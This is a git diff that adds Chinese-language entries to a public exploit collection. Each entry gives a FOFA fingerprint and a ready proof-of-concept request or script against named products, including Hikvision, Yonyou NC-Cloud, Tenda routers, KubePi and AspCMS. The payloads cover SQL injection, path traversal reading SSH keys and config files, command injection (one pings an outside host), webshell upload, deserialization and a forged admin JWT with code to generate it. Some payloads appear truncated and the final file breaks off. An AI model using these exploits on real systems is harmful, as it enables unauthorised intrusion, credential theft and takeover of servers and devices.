diff --git a/3C环境自动监测监控系统ReadLog文件读取漏洞.md b/3C环境自动监测监控系统ReadLog文件读取漏洞.md
new file mode 100644
index 0000000..bf8b729
--- /dev/null
+++ b/3C环境自动监测监控系统ReadLog文件读取漏洞.md
@@ -0,0 +1,33 @@
+# 3C环境自动监测监控系统ReadLog文件读取漏洞
+
+3C科技环境自动监测监控系统ReadLog读取报错日志功能点不受访问控制限制,存在任意文件读取漏洞。未经授权的攻击者可以读取服务器上的任意文件,从而获取系统权限和敏感信息。
+
+## fofa
+
+```yaml
+icon_hash="-338936081"
+```
+
+
+
+## poc
+
+```yaml
+GET /ajax/sys/LogService.ashx?Method=ReadLog&FileName=../web.config HTTP/1.1
+Host:
+Accept: text/plain, */*; q=0.01
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+X-Requested-With: XMLHttpRequest
+Referer: http:/{{Hostname}}/Sys/Log/FileLogList.aspx
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/CKJO9RohFllYOSnfdu_7Xw
\ No newline at end of file
diff --git a/AspCMS系统commentList.asp存在SQL注入漏洞.md b/AspCMS系统commentList.asp存在SQL注入漏洞.md
new file mode 100644
index 0000000..d8abda3
--- /dev/null
+++ b/AspCMS系统commentList.asp存在SQL注入漏洞.md
@@ -0,0 +1,17 @@
+# AspCMS系统commentList.asp存在SQL注入漏洞
+
+AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码,进行解密后登录获取敏感数据。
+
+## fofa
+
+```yaml
+app="ASPCMS"
+```
+
+## poc
+
+```asp
+/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
+```
+
+
\ No newline at end of file
diff --git a/ClusterControl存在任意文件读取漏洞.md b/ClusterControl存在任意文件读取漏洞.md
new file mode 100644
index 0000000..2b1c21e
--- /dev/null
+++ b/ClusterControl存在任意文件读取漏洞.md
@@ -0,0 +1,16 @@
+# ClusterControl存在任意文件读取漏洞
+
+
+
+## poc
+
+```yaml
+GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1
+Host:
+Accept-Encoding: identity
+User-Agent: python-urllib3/1.26.4
+```
+
+
+
+
\ No newline at end of file
diff --git a/KubePi存在JWT验证绕过漏洞(CVE-2024-36111).md b/KubePi存在JWT验证绕过漏洞(CVE-2024-36111).md
new file mode 100644
index 0000000..2fa0a5f
--- /dev/null
+++ b/KubePi存在JWT验证绕过漏洞(CVE-2024-36111).md
@@ -0,0 +1,104 @@
+# KubePi存在JWT验证绕过漏洞(CVE-2024-36111)
+
+kubepi jwttoken 校验存在缺陷,默认配置文件中jwt密钥为空,虽然读取配置文件相关逻辑中检测到密钥为空时,会生成一个随机32位字符串覆盖配置文件中的密钥,但是实际校验时,密钥为空,使用空密钥生成jwttoken可绕过登录校验,可直接接管后台
+
+## fofa
+
+```java
+"kubepi"
+```
+
+## poc
+
+
+
+使用空密钥生成jwt token
+
+```java
+eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4
+```
+
+使用生成的密钥创建用户tang
+
+```java
+POST /kubepi/api/v1/users HTTP/1.1
+Host: 127.0.0.1:9982
+Content-Length: 248
+sec-ch-ua:
+Accept: application/json, text/plain, */*
+lang: zh-CN
+Content-Type: application/json
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
+sec-ch-ua-platform: ""
+Origin: http://127.0.0.1:9982
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://127.0.0.1:9982/kubepi/user-management/users/create
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfSwiaWF0IjoxNzE2NDQ3MDEyLCJleHAiOjE3MjI0NDcwMTJ9.dedNLwXZu0JY1sgGBCRZmpFvAnLdHjxdPmKWXA7LCf4
+Connection: close
+
+{"apiVersion":"v1","kind":"User","name":"tang","roles":["Common User","Manage Image Registries","Manage Clusters","Manage RBAC"],"nickName":"tang","email":"tang@qq.com","authenticate":{"password":"12345678@Tang"},"mfa":{"enable":false,"secret":""}}
+```
+
+
+
+
+
+## 生成jwt token程序
+
+```go
+package main
+
+import (
+ "fmt"
+ "github.com/kataras/iris/v12/middleware/jwt"
+ "time"
+)
+
+var jwtMaxAge = 100000 * time.Minute
+
+type UserProfile struct {
+ Name string `json:"name"`
+ NickName string `json:"nickName"`
+ Email string `json:"email"`
+ Language string `json:"language"`
+ ResourcePermissions map[string][]string `json:"resourcePermissions"`
+ IsAdministrator bool `json:"isAdministrator"`
+ Mfa Mfa `json:"mfa"`
+}
+
+type Mfa struct {
+ Enable bool `json:"enable"`
+ Secret string `json:"secret"`
+ Approved bool `json:"approved"`
+}
+
+func main() {
+ jwtSigner := jwt.NewSigner(jwt.HS256, "", jwtMaxAge)
+ test := map[string][]string{}
+ profile := UserProfile{
+ Name: "admin",
+ NickName: "Administrator",
+ Email: "support@fit2cloud.com",
+ Language: "zh-CN",
+ ResourcePermissions: test,
+ IsAdministrator: true,
+ Mfa: Mfa{
+ Secret: "",
+ Enable: false,
+ Approved: false,
+ },
+ }
+ nonejwt, _ := jwtSigner.Sign(profile)
+ fmt.Println(string(nonejwt))
+}
+
+```
+
+## 漏洞来源
+
+- https://github.com/1Panel-dev/KubePi/security/advisories/GHSA-8q5r-cvcw-4wx7
\ No newline at end of file
diff --git a/Quicklancer系统接口listing存在SQL注入漏洞.md b/Quicklancer系统接口listing存在SQL注入漏洞.md
new file mode 100644
index 0000000..e9237a2
--- /dev/null
+++ b/Quicklancer系统接口listing存在SQL注入漏洞.md
@@ -0,0 +1,19 @@
+# Quicklancer系统接口listing存在SQL注入漏洞
+
+
+
+## fofa
+
+```java
+"service_fragments/css/gig_detail.css"
+```
+
+## poc
+
+```java
+GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1) AND 6477=6477 AND (1232=1232&salary-type=1&sort=id&subcat= HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+```
+
+
\ No newline at end of file
diff --git a/README.md b/README.md
index 03c4523..d4f6b4c 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,33 @@
# 漏洞收集
-收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了800多个poc/exp,善用CTRL+F搜索
+收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了900多个poc/exp,善用CTRL+F搜索
+
+## 2024.08.01 新增漏洞
+
+- 海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞
+- 北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞
+- Quicklancer系统接口listing存在SQL注入漏洞
+- KubePi存在JWT验证绕过漏洞(CVE-2024-36111)
+- Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)
+- Tenda-FH1201存在命令注入漏洞(CVE-2024-41468)
+- 海康威视综合安防管理平台clusters接口存在任意文件上传漏洞
+- 广联达OA系统接口ConfigService.asmx存在SQL注入漏洞
+- 广联达OA系统GetSSOStamp接口存在任意用户登录
+- 方天云智慧平台系统Upload.ashx存在任意文件上传漏洞
+- 用友NC-Cloud系统queryStaffByName存在SQL注入漏洞
+- 用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞
+- 契约锁电子签章平台ukeysign存在远程命令执行漏洞
+- AspCMS系统commentList.asp存在SQL注入漏洞
+- 满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926)
+- 万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749)
+- 深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750)
+- 任我行协同CRM系统UploadFile存在反序列化漏洞
+- 方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞
+- 用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞
+- 3C环境自动监测监控系统ReadLog文件读取漏洞
+- ClusterControl存在任意文件读取漏洞
+- 泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞
+- 致远互联FE协作办公平台apprvaddNew存在sql注入漏洞
+- 赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞
## 2024.07.30 新增漏洞
diff --git a/Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md b/Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md
new file mode 100644
index 0000000..c190df1
--- /dev/null
+++ b/Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md
@@ -0,0 +1,27 @@
+# Tenda-FH1201存在命令注入漏洞(CVE-2024-41468)
+
+Tenda FH1201 v1.2.0.14存在命令注入漏洞,位于exeCommand函数中,cmdinput参数未经任何过滤就被复制到栈空间v7中,然后执行,因此攻击者可以利用该漏洞执行任意命令
+
+固件下载网站:https://www.tendacn.com/download/detail-3322.html
+
+
+
+## poc
+
+```python
+import requests
+
+ip = '192.168.74.145'
+
+url = f"http://{ip}/goform/exeCommand"
+
+
+data = "cmdinput=ls;"
+ret = requests.post(url=url,data=data)
+```
+
+
+
+## 漏洞来源
+
+- https://github.com/iotresearch/iot-vuln/blob/main/Tenda/FH1201/exeCommand/README.md
\ No newline at end of file
diff --git a/Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md b/Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md
new file mode 100644
index 0000000..64c2118
--- /dev/null
+++ b/Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md
@@ -0,0 +1,26 @@
+# Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)
+
+Tenda FH1201 v1.2.0.14 存在命令注入漏洞,位于 WriteFacMac 函数中。mac 参数未经任何过滤就被复制到 var 中,然后执行,因此攻击者可利用此漏洞执行任意命令
+
+固件下载网址:https://www.tendacn.com/download/detail-3322.html
+
+
+
+## poc
+
+```python
+import requests
+
+ip = '192.168.74.145'
+
+url = "http://" + ip + "/goform/WriteFacMac"
+payload = ";echo 'hacker!'"
+
+data = {"mac": payload}
+response = requests.post(url, data=data)
+print(response.text)
+```
+
+## 漏洞来源
+
+- https://github.com/iotresearch/iot-vuln/tree/main/Tenda/FH1201/WriteFacMac
\ No newline at end of file
diff --git a/万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md b/万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md
new file mode 100644
index 0000000..817eaaa
--- /dev/null
+++ b/万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md
@@ -0,0 +1,18 @@
+# 万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749)
+
+万户ezOFFICE协同管理平台 `/defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp`接口处存在sql注入漏洞,攻击者可获取数据库中敏感信息
+
+## fofa
+
+```yaml
+app="万户网络-ezOFFICE"
+```
+
+
+## poc
+
+```yaml
+GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C5%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1
+Host:
+```
+
diff --git a/任我行协同CRM系统UploadFile存在反序列化漏洞.md b/任我行协同CRM系统UploadFile存在反序列化漏洞.md
new file mode 100644
index 0000000..1ae01a5
--- /dev/null
+++ b/任我行协同CRM系统UploadFile存在反序列化漏洞.md
@@ -0,0 +1,31 @@
+# 任我行协同CRM系统UploadFile存在反序列化漏洞
+
+
+
+## fofa
+
+```yaml
+"欢迎使用任我行CRM"
+```
+
+## poc
+
+```java
+POST /SystemManage/UploadFile HTTP/1.1
+Host: {{Hostname}}
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
+Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+
+photoInfo={
+'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{
+'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd', '/c whoami']
+},'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
+}
+```
+
diff --git a/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞.md b/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..a957170
--- /dev/null
+++ b/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞
+
+北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞,攻击者利用该漏洞可获取数据库权限。
+
+## fofa
+
+```java
+body="Maintain/cloud_index.php"
+```
+
+## poc
+
+```java
+GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
+Host:
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: keep-alive
+Cookie: PHPSESSID=f8la8ttr74fkge0pttpc626p45
+```
+
+
\ No newline at end of file
diff --git a/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md b/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md
new file mode 100644
index 0000000..a028e29
--- /dev/null
+++ b/契约锁电子签章平台ukeysign存在远程命令执行漏洞.md
@@ -0,0 +1,25 @@
+# 契约锁电子签章平台ukeysign存在远程命令执行漏洞
+
+契约锁电子签章平台 `/contract/ukeysign/.%2e/.%2e/template/param/edits `接口处存在远程代码执行漏洞,未经身份验证的攻击者可通过tomcat对路径参数解析不正当的特性绕过权限认证在目标执行恶意代码,获取服务器权限。经过分析和研判,该漏洞利用难度低,可导致远程代码执行,建议尽快修复。
+
+## fofa
+
+```java
+app="契约锁-电子签署平台"
+```
+
+## poc
+
+```java
+POST /contract/ukeysign/.%2e/.%2e/template/param/edits HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
+Gecko) Chrome/113.0.0.0 Safari/537.36
+Content-Type: application/json
+
+{"id":"2","params":[{"expression":"var a=new
+org.springframework.expression.spel.standard.SpelExpressionParser();var b='SpEL 表达式的 base64 编
+码';var b64=java.util.Base64.getDecoder();var deStr=new java.lang.String(b64.decode(b),'UTF-
+8');var c=a.parseExpression(deStr);c.getValue();"}]}
+```
+
diff --git a/广联达OA系统GetSSOStamp接口存在任意用户登录.md b/广联达OA系统GetSSOStamp接口存在任意用户登录.md
new file mode 100644
index 0000000..0fc56c8
--- /dev/null
+++ b/广联达OA系统GetSSOStamp接口存在任意用户登录.md
@@ -0,0 +1,32 @@
+# 广联达OA系统GetSSOStamp接口存在任意用户登录
+
+
+
+## fofa
+
+```java
+header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
+```
+
+## poc
+
+```java
+POST /WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx HTTP/1.1
+Host:
+Accept: */* Accept-Language: zh-CN,zh;q=0.9
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Content-Type: text/xml; charset=utf-8
+Content-Length: 350
+SOAPAction: "http://tempuri.org/GetStamp"
+
+
+
+
+
+
+admin
+
+
+
+```
+
diff --git a/广联达OA系统接口ConfigService.asmx存在SQL注入漏洞.md b/广联达OA系统接口ConfigService.asmx存在SQL注入漏洞.md
new file mode 100644
index 0000000..a94b020
--- /dev/null
+++ b/广联达OA系统接口ConfigService.asmx存在SQL注入漏洞.md
@@ -0,0 +1,30 @@
+# 广联达OA系统接口ConfigService.asmx存在SQL注入漏洞
+
+广联达OA系统接口 `/Webservice/IM/Config/ConfigService.asmx` 存在SQL注入漏洞。
+
+## fofa
+
+```yaml
+header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
+```
+
+## poc
+
+```xml
+POST /Webservice/IM/Config/ConfigService.asmx HTTP/1.1
+Host: {{Hostname}}
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
+Gecko) Chrome/123.0.6312.88 Safari/537.36
+Content-Type: text/xml;charset=UTF-8
+
+
+
+
+
+1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from
+T_ORG_USER --
+
+
+
+```
+
diff --git a/方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞.md b/方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞.md
new file mode 100644
index 0000000..fe80488
--- /dev/null
+++ b/方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞.md
@@ -0,0 +1,22 @@
+ # 方天云智慧平台系统GetCustomerLinkman存在sql注入漏洞
+
+
+
+## fofa
+
+```yaml
+body="AjaxMethods.asmx/GetCompanyItem"
+```
+
+## poc
+
+```
+POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1
+Host: ip
+Cookie: ASP.NET_SessionId=pb453i5abddajnqakas2ax1e
+Content-Type: application/json
+Content-Length: 300
+
+{clmID:"1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(106)+CHAR(113)+IS NULL(CAST(DB_NAME() AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL-- OSZH"}
+```
+
diff --git a/方天云智慧平台系统Upload.ashx存在任意文件上传漏洞.md b/方天云智慧平台系统Upload.ashx存在任意文件上传漏洞.md
new file mode 100644
index 0000000..c4fcd2b
--- /dev/null
+++ b/方天云智慧平台系统Upload.ashx存在任意文件上传漏洞.md
@@ -0,0 +1,32 @@
+# 方天云智慧平台系统Upload.ashx存在任意文件上传漏洞
+
+方天云智慧平台系统 Upload.ashx 接口处存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
+
+## fofa
+
+```java
+body="AjaxMethods.asmx/GetCompanyItem"
+```
+
+## poc
+
+```java
+POST /Upload.ashx HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
+Connection: close
+
+------WebKitFormBoundarySl8siBbmVicABvTX
+Content-Disposition: form-data; name="file"; filename="qwe.aspx"
+Content-Type: image/jpeg
+
+<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%>
+------WebKitFormBoundarySl8siBbmVicABvTX--
+```
+
+
+
+文件路径:`/UploadFile/CustomerFile/回显的路径`
+
+
\ No newline at end of file
diff --git a/泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞.md b/泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞.md
new file mode 100644
index 0000000..7aaa1f3
--- /dev/null
+++ b/泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞.md
@@ -0,0 +1,23 @@
+# 泛微E-Cology系统接口ReceiveCCRequestByXml存在XXE漏洞
+
+泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology系统接口`/rest/ofs/ReceiveCCRequestByXml` 存在XXE漏洞
+
+## fofa
+
+```java
+app="泛微-协同商务系统"
+```
+
+## poc
+
+```java
+POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
+Host:{{Hostname}}
+User-Agent:Mozilla/5.0(WindowsNT10.0;WOW64)AppleWebKit/537.36(KHTML, likeGecko)Chrome/71.0.3578.98Safari/537.36
+Content-Type:application/xml
+
+
+
+&send;
+```
+
diff --git a/海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.md b/海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.md
new file mode 100644
index 0000000..cee84b8
--- /dev/null
+++ b/海康威视综合安防管理平台clusters接口存在任意文件上传漏洞.md
@@ -0,0 +1,37 @@
+# 海康威视综合安防管理平台clusters接口存在任意文件上传漏洞
+
+海康威视综合安防管理平台 `/clusterMgr/clusters/ssl/file` 存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码。
+
+## fofa
+
+```yaml
+app="HIKVISION-综合安防管理平台"
+```
+
+## poc
+
+```java
+POST /clusterMgr/clusters/ssl/file;.js HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
+Chrome/112.0.0.0 Safari/537.36 HTML
+Accept: */*
+Host: 8.8.8.8:1443
+Accept-Encoding: gzip, deflate
+Connection: close
+Content-Type: multipart/form-data; boundary=--------------------------984514492333278399715408
+Content-Length: 339
+
+----------------------------984514492333278399715408
+Content-Disposition: form-data; name="file"; filename="languages/default.jsp"
+Content-Type: image/png
+
+<%=123%>
+----------------------------984514492333278399715408
+Content-Disposition: form-data; name="proxyAddress"
+
+8.8.8.8
+----------------------------984514492333278399715408--
+```
+
+文件地址`/clusterMgr/languages/default.jsp;.js`
+
diff --git a/海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞.md b/海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞.md
new file mode 100644
index 0000000..316f91a
--- /dev/null
+++ b/海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞.md
@@ -0,0 +1,42 @@
+# 海康威视综合安防管理平台licenseExpire存在前台远程命令执行漏洞
+
+海康威视综合安防管理平台 `/portal/cas/login/ajax/licenseExpire.do` 存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码。
+
+## fofa
+
+```yaml
+app="HIKVISION-综合安防管理平台"
+```
+
+## poc
+
+```
+POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
+Host:
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+{"type":"environment","operate":"","machines":{"id":"$(ping+qsdiehtuxn.dgrh3.cn)"}
+```
+
+```java
+POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
+Host:
+Cache-Control: max-age=0
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+If-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=jp9u6tFmSc3fk7Jzf9DQjK25abfBb_b4Yy1r4rax; curtTabId=all; configMenu=
+Connection: close
+Content-Length: 135
+
+{"type":"environment","operate":"","machines":{"id":"$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}
+```
+
+文件路径
+
+`/vms/static/1.txt`
\ No newline at end of file
diff --git a/深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750).md b/深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750).md
new file mode 100644
index 0000000..7144897
--- /dev/null
+++ b/深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750).md
@@ -0,0 +1,20 @@
+# 深澜计费管理系统bind-ip远程代码执行漏洞(XVE-2024-18750)
+
+
+
+## fofa
+
+```yaml
+"/js/lib/slimscroll.js"
+```
+
+## poc
+
+```python
+POST /strategy/ip/bind-ip HTTP/2
+Host:
+Content-Type: application/x-www-form-urlencoded
+
+data1=O%3A33%3A%22setasign%5CFpdi%5CPdfReader%5CPdfReader%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00parser%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A12%3A%7B
+```
+
diff --git a/满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md b/满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md
new file mode 100644
index 0000000..56ca456
--- /dev/null
+++ b/满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926).md
@@ -0,0 +1,11 @@
+# 满客宝智慧食堂系统downloadWebFile存在任意文件读取漏洞(XVE-2024-18926)
+
+
+
+## poc
+
+```java
+GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=a&ossKey=/../../../../../../../../../../../etc/passwd HTTP/1.1
+Host:
+```
+
diff --git a/用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md b/用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md
new file mode 100644
index 0000000..8274eed
--- /dev/null
+++ b/用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 用友NC-Cloud系统queryPsnInfo存在SQL注入漏洞
+
+用友NC Cloud queryPsnInfo接口存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
+
+## fofa
+
+```yaml
+app="用友-NC-Cloud"
+```
+
+## poc
+
+```java
+GET /ncchr/pm/obj/queryPsnInfo?staffid=1%27+AND+1754%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%281754%3D1754%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29--+Nzkh HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
+Host:
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
diff --git a/用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md b/用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md
new file mode 100644
index 0000000..8101bee
--- /dev/null
+++ b/用友NC-Cloud系统queryStaffByName存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 用友NC-Cloud系统queryStaffByName存在SQL注入漏洞
+
+ NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud系统queryStaffByName存在SQL注入漏洞。
+
+## fofa
+
+```yaml
+app="用友-NC-Cloud"
+```
+
+## poc
+
+```js
